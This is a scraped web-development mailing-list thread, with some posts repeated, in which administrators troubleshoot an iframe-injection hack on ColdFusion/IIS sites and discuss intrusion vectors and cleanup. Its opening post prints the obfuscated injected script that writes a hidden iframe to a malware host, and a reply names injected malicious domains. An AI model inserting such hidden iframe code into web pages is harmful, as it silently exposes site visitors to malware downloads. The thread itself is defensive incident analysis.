Ok, I wanted to post here because I have been looking around on google the
last few days because we had the same issue to give an update on to all the
findings we have found from our investigation...
First off this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.
Whatever has been writing the script seems to be embedded in either one of
the coldfusion files somewhere or in the database you are executing from, we
have not figured it out yet.
This is what we have decided to do to solve the issue...
Step 1: Shut down IIS. Whatever is causing this requires IIS to run from
what we have seen.
Step 2: I have written a simple script in PHP (because that is what I script
in) that will go through every file in the specified path and remove
anything that it finds matching the pattern in the 2.txt file. (default is
what was being written to our server). It will log all the files it changed
to alog.log file in the same directory. Here is what you need to do to run
the script...
1. Download: http://www.rallyinfo.com/fixer.zip
2. Extract it somewhere on the server.
3. Install PHP (if you don't already have it, REQ PHP5+ [I believe])
4. Open the 1.php file in the folder you extracted it too, and edit the
line that says "Path = 'D:/'" to whatever path you want to check for (i'd
suggest run it multiple times on every drive).
5. Open a command line go to the folder that you extracted it to.
(example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO",
then if it is on a different drive type the drive letter followed by a ":")
6. type "php 1.php". Now wait, it may take hours depending on how many
files it has to read.
This script will ONLY remove the infected files, it will NOT fix the issue.
We have not figured out what is causing the issue. I have a feeling, since
we are using access database to hold the info for ColdFusion, that there is
somewhere in the database it is executing from, however we have no proof
yet. Another theory is that it somehow implanted itself into one of the CF
files on whatever site had it infected first. And every time someone goes to
that site it re-runs the script to infect a script to infect other files
with it.
Step 3: Either uninstall ColdFusion or turn it off so it will no longer be
ran in IIS. We decided to uninstall ColdFusion because we only have about 2
sites that still use it, and we have decided to convert them into PHP.
After that I cannot help much, seens how we didn't actually find the issue,
but rather made it unable to run any longer.
If you have any questions or comments I will actively watch this thread, and
I will assist in (only though this thread) removing corrupted files.
-Nathan Bruer
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321494
Nathan,
Thank you for contributing to this thread. It reminds me to add a bit of
our research on this issue as well. A couple of posts which seem very on
point are here:
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://www.abuse.ch/?p=737
We don't think that this is limited to CF, but there may be a number of
variation in play.
Thanks again,
Nick
Author: Nathan Bruer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321493
Ok, I wanted to post here because I have been looking around on google the last
few days because we had the same issue to give an update on to all the findings
we have found from our investigation...
First off this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.
Whatever has been writing the script seems to be embedded in either one of the
coldfusion files somewhere or in the database you are executing from, we have not
figured it out yet.
This is what we have decided to do to solve the issue...
Step 1: Shut down IIS. Whatever is causing this requires IIS to run from what we
have seen.
Step 2: I have written a simple script in PHP (because that is what I script in)
that will go through every file in the specified path and remove anything that it
finds matching the pattern in the 2.txt file. (default is what was being written
to our server). It will log all the files it changed to alog.log file in the same
directory. Here is what you need to do to run the script...
1. Download: http://www.rallyinfo.com/fixer.zip
2. Extract it somewhere on the server.
3. Install PHP (if you don't already have it, REQ PHP5+ [I believe])
4. Open the 1.php file in the folder you extracted it too, and edit the line
that says "Path = 'D:/'" to whatever path you want to check for (i'd suggest run
it multiple times on every drive).
5. Open a command line go to the folder that you extracted it to. (example, in
the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", then if it is on a
different drive type the drive letter followed by a ":")
6. type "php 1.php". Now wait, it may take hours depending on how many files
it has to read.
This script will ONLY remove the infected files, it will NOT fix the issue. We
have not figured out what is causing the issue. I have a feeling, since we are
using access database to hold the info for ColdFusion, that there is somewhere in
the database it is executing from, however we have no proof yet. Another theory
is that it somehow implanted itself into one of the CF files on whatever site had
it infected first. And every time someone goes to that site it re-runs the script
to infect a script to infect other files with it.
Step 3: Either uninstall ColdFusion or turn it off so it will no longer be ran in
IIS. We decided to uninstall ColdFusion because we only have about 2 sites that
still use it, and we have decided to convert them into PHP.
After that I cannot help much, seens how we didn't actually find the issue, but
rather made it unable to run any longer.
If you have any questions or comments I will actively watch this thread, and I
will assist in (only though this thread) removing corrupted files.
-Nathan Bruer
Author: Nathan Bruer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321492
Ok, I wanted to post here because I have been looking around on google the last
few days because we had the same issue to give an update on to all the findings
we have found from our investigation...
First off this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.
Whatever has been writing the script seems to be embedded in either one of the
coldfusion files somewhere or in the database you are executing from, we have not
figured it out yet.
This is what we have decided to do to solve the issue...
Step 1: Shut down IIS. Whatever is causing this requires IIS to run from what we
have seen.
Step 2: I have written a simple script in PHP (because that is what I script in)
that will go through every file in the specified path and remove anything that it
finds matching the pattern in the 2.txt file. (default is what was being written
to our server). It will log all the files it changed to alog.log file in the same
directory. Here is what you need to do to run the script...
1. Download: http://www.rallyinfo.com/fixer.zip
2. Extract it somewhere on the server.
3. Install PHP (if you don't already have it, REQ PHP5+ [I believe])
4. Open the 1.php file in the folder you extracted it too, and edit the line
that says "Path = 'D:/'" to whatever path you want to check for (i'd suggest run
it multiple times on every drive).
5. Open a command line go to the folder that you extracted it to. (example, in
the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO", then if it is on a
different drive type the drive letter followed by a ":")
6. type "php 1.php". Now wait, it may take hours depending on how many files
it has to read.
This script will ONLY remove the infected files, it will NOT fix the issue. We
have not figured out what is causing the issue. I have a feeling, since we are
using access database to hold the info for ColdFusion, that there is somewhere in
the database it is executing from, however we have no proof yet. Another theory
is that it somehow implanted itself into one of the CF files on whatever site had
it infected first. And every time someone goes to that site it re-runs the script
to infect a script to infect other files with it.
Step 3: Either uninstall ColdFusion or turn it off so it will no longer be ran in
IIS. We decided to uninstall ColdFusion because we only have about 2 sites that
still use it, and we have decided to convert them into PHP.
After that I cannot help much, seens how we didn't actually find the issue, but
rather made it unable to run any longer.
If you have any questions or comments I will actively watch this thread, and I
will assist in (only though this thread) removing corrupted files.
-Nathan Bruer
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321442
> > In that case, you can no longer trust the host, or it's
> > host (if it's visualised). In the latter case, all other
> > guests on the same box are also suspect.
> I've not heard of a remote exploit that can climb out of a VM.
It's trivial to do (look at Invisible Labs red pill / blue pill work for how
it works on 'bare metal' hypervisors, and there was an exploit against VMWare
the other year).
If I was targeting ecommerce sites, I'd want to tick that box in my malware's
toolkit.
--
Helping to completely enable impactful end-to-end data as part of the IT team
of the year, '09 and '08
Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099
Tom.Chiverton@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office together with a list of those
non members who are referred to as partners. We use the word partner to refer
to a member of the LLP, or an employee or consultant with equivalent standing and
qualifications. Regulated by the Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit www.Halliwells.com.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321379
> In that case, you can no longer trust the host, or it's
> host (if it's visualised). In the latter case, all other
> guests on the same box are also suspect.
I've not heard of a remote exploit that can climb out of a VM.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321378
> So, I guess one question is whether an XSS type
> hack can result in code being added to a file on the
> web server.
No, not by itself. The WebDAV that Mosh mentioned, that's a likely culprit.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321377
----- Excess quoted text cut - see Original Post for more -----
My first thought is, if this script has actually been written to your
.cfm files, this is a successful hack, not a hack attempt.
My second thought is, why are these files writeable in the first
place? In the vast majority of CF apps, neither the CF user account
nor the IIS user account needs write permission to your CF files.
Finally, I'm not aware of any specific worm that does this exact
thing. Nor am I aware of any IIS issue that would allow this. My guess
is that you have some CF application that allows writes to the
filesystem; perhaps one of the CF sample apps?
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for
Author: Mosh Teitelbaum
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321376
Nick:
In addition to FTP, etc., check to see if you have WebDAV enabled on your
server. It's an extension of HTTP that allows people to remotely author
files on a website. A couple of years back, a client of mine had their site
modified with WebDAV and, upon further review, every site on that server
that had an index.cfm file had had that file modified to include the
malicious code.
HTH
--
Mosh Teitelbaum
evoch, LLC
Tel: (301) 942-5378
Fax: (301) 933-3651
Email: mosh.teitelbaum@evoch.com
WWW: http://www.evoch.com/
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321374
And if your CFML templates have been changed, it is possible that malware has
been installed on the server itself (via cfexecute).
In that case, you can no longer trust the host, or it's host (if it's
visualised). In the latter case, all other guests on the same box are also
suspect.
Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099
Tom.Chiverton@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office together with a list of those
non members who are referred to as partners. We use the word partner to refer
to a member of the LLP, or an employee or consultant with equivalent standing and
qualifications. Regulated by the Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit www.Halliwells.com.
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321373
Nick, it is *POSSIBLE* for your actual index.cfm files to be modified
via SQL injection (xp_cmdshell on MS SQL Server), but it is highly
doubtful.
I can't think of a scenario where XSS could actually affect files on
your server since that is a client-based attack. The XSS attack would
need to be coupled with a server-side vulnerability.
I would focus directly on all of your FTP access, Windows file sharing
access, and telnet/remote desktop connections. If you using shared
hosting, your problem just got a lot harder to track down.
Also, for the record-- it is possible for an attacker to modify cfm
files on your server if you have a piece of your application that allows
users to upload files to the server (like images or attachments) and
these files are placed in a web accessible location where they could be
accessed via a URL and executed. (imagine uploading a .cfm file with a
few cffile tags in it...)
The probability of this sort of attack is smaller than the chances of
someone brute-forcing your FTP login though.
Like I said before, change ALL your passwords, and check your logs. If
this is a publicly accessible server, it should be behind a firewall
blocking ALL ports not absolutley necessary (like 80 and 443)
~Brad
Brad,
Many thanks for your response. We'll take a look at those things.
It appears that the code is in the actual index.cfm pages on the web
server.
There are some old sites on this server that may be vulnerable, so that
is a
theory. However, I would expect that kind of vulnerability to result in
a
database injection, which is not what we are seeing. So, I guess one
question is whether an XSS type hack can result in code being added to a
file on the web server.
Author: Bosky, Dave
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321369
It's an iframe injection hack. It will insert a hidden frame into any
index.* page it finds.
Some urls entries inserted are 'goooogleleadsense.biz/?click=*****',
'mediahousenameshopfilm.cn/in.cgi?income29'
Change FTP passwords...
William,
That's a great post - we're re-reading it now. However, this situation
seems to be code in the index.cfm page, not something being appended
from
the db. So, I'm not sure if that post will be relevant in this case.
Thoughts?
N
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321366
William,
That's a great post - we're re-reading it now. However, this situation
seems to be code in the index.cfm page, not something being appended from
the db. So, I'm not sure if that post will be relevant in this case.
Thoughts?
N
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321365
Brad,
Many thanks for your response. We'll take a look at those things.
It appears that the code is in the actual index.cfm pages on the web server.
There are some old sites on this server that may be vulnerable, so that is a
theory. However, I would expect that kind of vulnerability to result in a
database injection, which is not what we are seeing. So, I guess one
question is whether an XSS type hack can result in code being added to a
file on the web server.
Thoughts?
N
----- Excess quoted text cut - see Original Post for more -----
Author: William
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321362
Do a search on this list for 'exec('
There was a big todo about this last summer. Probably in your database
Hi there. We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
The script downloads malware, which we obviously want to prevent. We're
trying to determine how it's getting in their, whether through an old site
with inadequate code or the OS or something else. Any thoughts?
This is on a server running IIS 6 / CF7.
Thanks in advance,
Nick
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321361
Is the malicious string in the actual index.cfm page on the server, or
is it being output on the page when CF processes it as part of a
variable from the form/url or database?
If the actual files on your web server have been modified, change all
your FTP and remote admin passwords immediately and run an antivirus
scan.
Also, check your FTP logs, and date/time modified on the files to
determine when and how they were modified. Run an extended find a
replaced to clean your .cfm files.
If the string is being appended into a url or form field and then output
on the page, htmleditformat or jsstringformat all user-entered data and
read up on XSS attacks.
If the string has been appended into your database variables and is
being output on the page that way, look for un paramaterized SQL
statements, run a queryparam scanner, change your SQL Server login
passwords, and read up on SQL injection attacks. Update your database
to remove the malicious values.
~Brad
Hi there. We've just seen a hack attempt that we haven't seen before and
I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of
certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321353
Hi there. We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
The script downloads malware, which we obviously want to prevent. We're
trying to determine how it's getting in their, whether through an old site
with inadequate code or the OS or something else. Any thoughts?
This is on a server running IIS 6 / CF7.
Thanks in advance,
Nick
|
May 24, 2012
|
Latest Fusion Authority Articles
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
